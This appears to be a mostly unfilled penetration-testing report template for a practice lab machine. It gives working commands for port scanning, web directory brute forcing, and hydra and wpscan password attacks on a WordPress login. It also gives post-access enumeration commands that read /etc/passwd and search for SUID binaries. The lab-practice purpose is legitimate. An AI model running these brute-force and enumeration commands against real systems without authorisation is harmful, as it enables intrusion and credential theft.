HTB_AD_Test: Penetration Testing Report
| Name | item |
|---|---|
| Platform | OSCP |
| Date | 2025-09-19 21:06:57 |
| Auth | Blackwin |
| Tools | |
| Keywords | |
| IP address | 10.10.11.51 |
| Flag | proof.txt: local.txt: |
1. Initial Reconnaissance
Port scanning
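```bash
# rustscan: fast sweep of all TCP ports, no follow-up scripts
rustscan -a 10.10.11.51 --scripts none --ulimit 5000 | tee scans/rustscan
# nmap scan: collect the open ports as a comma-separated list (trailing comma stripped)
ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.51 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
# default scripts and service/version detection against the open ports only
sudo nmap -p"$ports" -sC -sV 10.10.11.51 -oN scans/nmap-all
```

2. Enumeration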
FTP Enum
ftp,lftp
SMB Enum
enum4linux
Web Enum
directory brute
```bash
ffuf -u http://10.10.11.51/FUZZ -w /usr/share/wordlists/dirb/big.txt
gobuster dir -u http://10.10.11.51/ -w /usr/share/wordlists/dirb/big.txt
```

brute force login
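```bash
# http-post-form takes three colon-separated fields: path, form body, failure condition
hydra -l loly -P rockyou.txt 10.10.11.51 http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:F=Error" -V -t 5 -w 1 -o results.txt
wpscan --url http://10.10.11.51/wordpress -U loly -P rockyou.txt
```

3. Initial Shell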
4. Post-Enumeration
get flag: find / -name local.txt 2>/dev/null
get basic info:
- OS version:
- sudo version:
- psexec version:
- users: cat /etc/passwd
- flag: find / -name local.txt 2>/dev/null
- SUID binaries:
  - `find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null`
  - `find / -uid 0 -perm -6000 -type f 2>/dev/null`
